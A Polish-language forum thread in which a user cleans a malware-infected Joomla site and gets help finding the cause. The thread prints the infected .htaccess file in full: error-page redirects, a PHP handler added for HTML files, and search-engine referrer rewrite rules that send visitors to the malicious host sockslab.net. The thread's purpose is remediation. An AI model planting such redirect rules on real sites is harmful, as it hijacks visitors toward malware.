Mam następujący kłopot:

Koledzy poprosili nie o pomoc. Ich strona padła po ataku wirusa ( strona jest na serwerze http://www.webd.pl/).
Wyczyściłem katalog w którym przechowywali Joomlę, zrobiłem kopię bazy danych. Zainstalowałem nową Joomlę i przywróciłem bazę danych.

Strona od frontu stanęła. Problem pojawia się kiedy w panelu administracyjnym próbuję zatwierdzić jakieś działanie. Każde kliknięcie zapisz, zastosuj czy nauluj powoduje przeniesienie na stronę:

sockslab . net/in.cgi?7&parameter=sockslab

FF mi zgłasza, że ta strona jest zagrożeniem - dlatego nie wchodziłem na to g***o.

Czy ktoś może mi poradzić jak sobie z tym poradzić?

A pliki Joomla zostały nadpisane?

Nie nadpisywałem ich - były z Joomla! 1.5.10. Wykasowałem je do czysta i wypakowałem świeżutką paczkę z Joomla 1.5.14. Tylko wpisy w bazie danych są ze starej strony. Ale szukałem w niej zapisów "sockslab" i jest czysto.

Może masz jeszcze ukryty plik .htaccess w głównym folderze serwera? usuń go lub nadpisz tym z Joomla!
Piszę, bo nie napisałeś nawet czy problem nadal występuje.

I nie podałeś linka.

@KYCu

Faktycznie w pliku .htaccess jest coś takiego:


ErrorDocument 400 http://sockslab.net/in.cgi?8&parameter=sockslab
ErrorDocument 401 http://sockslab.net/in.cgi?8&parameter=sockslab
ErrorDocument 403 http://sockslab.net/in.cgi?8&parameter=sockslab
ErrorDocument 404 http://sockslab.net/in.cgi?8&parameter=sockslab
ErrorDocument 500 http://sockslab.net/in.cgi?8&parameter=sockslab
AddType application/x-httpd-php .php .htm .html .phtml


RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://sockslab.net/in.cgi?7&parameter=sockslab [R=301,L]


Wywalić wszystkie wpisy z sockslab? czy zastąpić je czymś?
Ten plik znajduje się w katalogu public_html, który zawiera katalog gdzie trzymam Joomlę.

@moje:


Nie podałem odnośnika bo problem występuje jedynie na zapleczu.

Zastąp cały plik, tym standardowym z Joomla.

Takie pliki są w sumie trzy:

- jeden w katalogu głównym public_html (z wirusem)
- jeden w katalogu forum PHPBB2 by Przemo (z wirusem)
- i ten nowy z Joomli

Czy tym joomlowym zastąpić oba?

w public_html powinieneś mieć właśnie jeden plik .htaccess z joomla, bez rozszerzenia .txt

Ten z phpBB zamień na standardowy z phpBB, o ile takowy jest, jak nie ma, to usuń ten z wirusem.

Ledwo spróbowałem a wirus znowu pomieszał składnię w plikach php :( Siedzi gdzieś drań na serwerze. Zgłaszam sprawę usługodawcy - niech przeskanuje serwer.

Pliki .htaccess nie zgłasza jako wirusa więc polecą z ręki. Dam znać jak sprawa się potoczyła.

Przy okazji czy te zmiany w składni powoduje ten zapis w .htaccess:


RewriteRule ^(.*)$ http://sockslab.net/in.cgi?7&parameter=sockslab [R=301,L]

Jest to część reguły przekierowującej na wskazaną stronę.

Najprostszym sposobem byłoby sprawdzić wszystkie pliki na obecność wyrażenia "sockslab". Każdy plik, który zawiera coś podobnego wyczyścić i usunąć te pliki z serwera, a następnie wgrać wyczyszczone na ich miejsce. Pliki możesz sprawdzić na obecność jakiejś frazy np. PSPadem. Mam nadzieję, że sobie poradzisz. Rozumiem, że wiesz, że powinieneś zmienić wszystkie hasła do bazy, ftp, panelu admina... Równocześnie powinieneś wyeksportować bazę danych i również sprawdzić czy nie ma w pliku szukanej frazy.

Dzięki, spróbuję tak z plikami... to bedzie musiało chyba objąć cały serwer a nie tylko public_html... Bazę już sprawdzałem. Dzięki z tymi radami załatwię wirusa ;)

Jeśli wirus, trojan czy inne badziewie jest wyżej niż w public_html, to zmień dostawcę hostingu, bo ma zupełnie niezabezpieczony serwer. Ale to jest raczej możliwe tylko u totalnych partaczy lub na localu.